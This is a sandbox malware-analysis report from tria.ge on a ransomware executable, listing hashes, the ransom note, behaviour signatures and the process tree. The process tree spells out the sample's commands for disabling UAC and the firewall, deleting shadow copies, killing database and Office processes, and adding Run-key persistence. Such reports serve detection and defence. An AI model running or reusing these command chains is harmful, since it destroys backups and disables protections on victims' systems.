Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

rcru_64.exe

windows7_x64

10

rcru_64.exe

windows10_x64

10

Analysis

  • max time kernel
    128s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    01/04/2021, 09:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rcru_64.exe

  • Size

    1.0MB

  • MD5

    0d5d7377432ee449f30626c2371a0080

  • SHA1

    56a1d1203d62c131b70837d75af79aa19a3b0487

  • SHA256

    94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

  • SHA512

    19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Score
10/10
evasionpersistenceransomwaretrojan

Malware Config

Extracted

Path

\??\c:\Read_Me!_.txt

Ransom Note
Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : 8oBO6b Email Address :[email protected]

Signatures

  • UAC bypass 3 TTPs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 40 IoCs
    evasion
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
    "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:1624
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3848
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3344
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
          PID:1424
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall set opmode mode=disable
          3⤵
            PID:4088
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
            3⤵
              PID:1528
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2240
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im notepad.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1800
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im msftesql.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3704
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlagent.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3944
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlbrowser.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3860
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlservr.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3524
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlwriter.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3712
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im oracle.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3676
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocssd.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:744
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im dbsnmp.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1376
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im synctime.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2452
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im agntsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3672
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mydesktopqos.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2128
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im isqlplussvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1768
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im xfssvccon.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:588
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mydesktopservice.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2164
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocautoupds.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:584
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im agntsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im encsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3160
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im firefoxconfig.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im tbirdconfig.exe
              3⤵
              • Kills process with taskkill
              PID:752
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocomm.exe
              3⤵
              • Kills process with taskkill
              PID:748
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld.exe
              3⤵
              • Kills process with taskkill
              PID:3948
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld-nt.exe
              3⤵
              • Kills process with taskkill
              PID:2100
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld-opt.exe
              3⤵
              • Kills process with taskkill
              PID:3156
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im dbeng50.exe
              3⤵
              • Kills process with taskkill
              PID:3924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqbcoreservice.exe
              3⤵
              • Kills process with taskkill
              PID:3868
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im excel.exe
              3⤵
              • Kills process with taskkill
              PID:3556
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im infopath.exe
              3⤵
              • Kills process with taskkill
              PID:504
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im msaccess.exe
              3⤵
              • Kills process with taskkill
              PID:3404
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mspub.exe
              3⤵
              • Kills process with taskkill
              PID:2736
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im onenote.exe
              3⤵
              • Kills process with taskkill
              PID:1028
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im outlook.exe
              3⤵
              • Kills process with taskkill
              PID:2420
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im powerpnt.exe
              3⤵
              • Kills process with taskkill
              PID:3928
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im steam.exe
              3⤵
              • Kills process with taskkill
              PID:3844
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thebat.exe
              3⤵
              • Kills process with taskkill
              PID:2564
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thebat64.exe
              3⤵
              • Kills process with taskkill
              PID:580
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thunderbird.exe
              3⤵
              • Kills process with taskkill
              PID:3472
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im visio.exe
              3⤵
              • Kills process with taskkill
              PID:2192
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im winword.exe
              3⤵
              • Kills process with taskkill
              PID:2748
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im wordpad.exe
              3⤵
              • Kills process with taskkill
              PID:4028
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c echo %date%-%time%
            2⤵
              PID:3972
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ver
              2⤵
                PID:3732
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                2⤵
                  PID:1040
                  • C:\Windows\SysWOW64\nslookup.exe
                    nslookup myip.opendns.com. resolver1.opendns.com
                    3⤵
                      PID:2720
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                    2⤵
                      PID:2868
                      • C:\Windows\SysWOW64\reg.exe
                        reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                        3⤵
                          PID:2732
                        • C:\Windows\SysWOW64\reg.exe
                          reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                          3⤵
                          • Modifies registry key
                          PID:812
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                        2⤵
                          PID:2116
                          • C:\Windows\SysWOW64\reg.exe
                            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                            3⤵
                            • Adds Run key to start application
                            • Modifies registry key
                            PID:1520
                          • C:\Windows\SysWOW64\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                            3⤵
                            • Adds Run key to start application
                            PID:3032
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2572

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads